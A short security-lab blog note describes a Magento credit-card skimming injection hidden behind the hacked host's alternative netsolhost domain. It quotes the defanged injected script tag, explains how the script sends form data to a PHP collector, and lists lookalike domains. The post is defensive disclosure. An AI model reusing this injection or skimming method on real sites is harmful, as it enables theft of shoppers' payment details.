Host’s Alternative Domain Names May Hide Malware

Labs Note

To make malicious injections look less suspicious, hackers like to use domains that look credible. It may be some typo domain like google-analystisc[.]com instead of google-analytics.com, or correct domain names under a different TLDs, e.g.: ads.googleadservices[.]at or googleads.g.doubleclick[.]cn.com.

Sometimes they hide their scripts and iframes befind shortened URL. Other times they upload malicious content to public services like Pastebin.

This time we discovered a script injection that used site\’s alternative domain name provided by its host for free to their clients. In this case the malicious script was placed on a hacked site hosted on a Network Solutions\’ server. So instead of using the real domain name, which could alert the webmaster of the hacked site when the domain gets blacklisted, hackers used its alternative 0055d7b.netsolhost[.]com address.

We found this code injected into multiple design/head/includes rows (different scopes) of the core_config_data table in the Magento database:

<script src="//0055d7b . netsolhost[.]com/Blog/lib2/js/js.js"> </script>

The script looks like coming from some Network Solutions CDN. However, it\’s a malicious script on a site where everything below /Blog was created by hackers (e.g. you can find a PHProxy script under Blog/lib2/ – the tool that hackers use to make anonymous requests to third-party sites, e.g. access backdoors). The js.js script itself adds extra handlers that intercept all data entered into all HTML forms on the infected Magento site and send them to a PHP script on the same Networks Solution server 0055d7b .netsolhost[.]com/Blog/lib2/js/main.php. Technically, the script is used to steal credit card and other sensitive payment details from order forms on e-commerce sites (although it can be used to steal credentials from login forms too).

Don\’t trust third-party content just because it uses a reputable domain name. Always doublecheck everything that you don\’t recognize or don\’t believe should be on your site. Test your database and files on server for integrity, and monitor your site for security issues.

You May Also Like